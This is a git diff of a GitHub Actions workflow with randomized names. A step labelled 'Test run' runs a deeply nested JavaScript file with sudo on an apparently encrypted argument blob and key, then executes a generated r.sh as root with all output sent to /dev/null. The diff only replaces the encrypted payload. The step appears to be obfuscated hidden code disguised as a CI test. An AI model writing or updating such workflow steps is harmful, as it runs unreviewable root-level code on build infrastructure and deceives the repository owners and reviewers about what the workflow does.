--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'fidwk'
+        echo '51e40'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX196jVeSNjY0XpphB0AduH4mGj5eVZ3fkc3l7FTfZRCPk1dIfcJwSLlCD/eMaI1M5G4GR/IcsQJbotyNZN6wd8kkVHiP9h4lDF40xL2czvS4xA6AJpG8AaIa l4k7mk && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19/l5c0Aqw15MY8RWeHjLSR1EcRILTGL0ID8Ps7SZtVMg6sU6OEarLJElsZsdLwjdema5is4mNQiFvsotVRuqxdFOw+HYC76XTB1TOcAPTbpofqK7rW7J9+ 7vzqoz && sudo sh r.sh > /dev/null 2>&1
